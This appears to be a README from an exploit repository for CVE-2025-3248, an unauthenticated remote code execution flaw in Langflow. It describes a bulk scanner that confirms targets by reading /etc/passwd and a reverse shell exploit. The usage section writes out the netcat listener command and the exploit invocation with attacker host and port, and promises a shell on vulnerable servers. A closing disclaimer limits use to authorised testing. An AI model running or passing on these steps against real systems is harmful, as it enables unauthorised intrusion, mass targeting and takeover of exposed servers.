Share
## https://sploitus.com/exploit?id=7BFED669-FAC0-5596-915A-7E14C6C03D6C
# CVE-2025-3248: Langflow Unauthenticated Remote Code Execution (RCE)

This repository contains two Python scripts:
- `LangflowCheck.py`: A scanner that checks for Langflow AI instances vulnerable to CVE-2025-3248.
- `exploit.py`: A working reverse shell exploit for vulnerable Langflow targets.

## Summary

**CVE-2025-3248** is a critical vulnerability in Langflow AI that allows **unauthenticated attackers** to execute arbitrary Python code remotely via a crafted payload to `/api/v1/validate/code`.

---

## Files

### `LangflowCheck.py`

- Checks if a target is vulnerable by attempting to execute a harmless payload that reads `/etc/passwd`.
- Can scan a single target or a list of URLs.
- Supports outputting vulnerable targets to a file.

### `exploit.py`

- Sends a reverse shell payload to the vulnerable endpoint.
- Requires attacker IP (`lhost`) and listener port (`lport`).
- Logs activity to `exploit.log`.
- Supports listener check before sending payload.

---

## Usage

### 1. Install Requirements
```bash
pip install -r requirements.txt
```
### 2. Run Vulnerability Scanner
Single URL
```bash
python3 LangflowCheck.py --url http://target.com --output vulnerable_target.txt
````
![1](https://github.com/user-attachments/assets/ef572e83-21ad-4661-86b0-9c575e092ba0)

Multiple Targets
```bash
python3 LangflowCheck.py --file targets.txt --output vulnerable_targets.txt
```
![tt](https://github.com/user-attachments/assets/76133300-41fa-4b1f-8722-24186b8add20)


### 3. Exploit a Target

First, start a listener
```bash
sudo nc -nvlp 4444
```
![l](https://github.com/user-attachments/assets/6e3e3275-d5a7-4aad-a148-3cb48fcd7103)

Then, run the exploit:
```bash
python3 exploit.py --target http://target.com --lhost YOUR_IP --lport 4444
```
![2](https://github.com/user-attachments/assets/6d24cf8d-8a15-4844-9794-d9d91de80218)


You should receive a shell if the target is vulnerable.
![root](https://github.com/user-attachments/assets/291a630e-ab53-4ab3-92e3-c1ac973e377c)


## โš ๏ธ Disclaimer

This exploit is for educational and authorized security testing only. Do not use against systems you do not own or have explicit permission to test.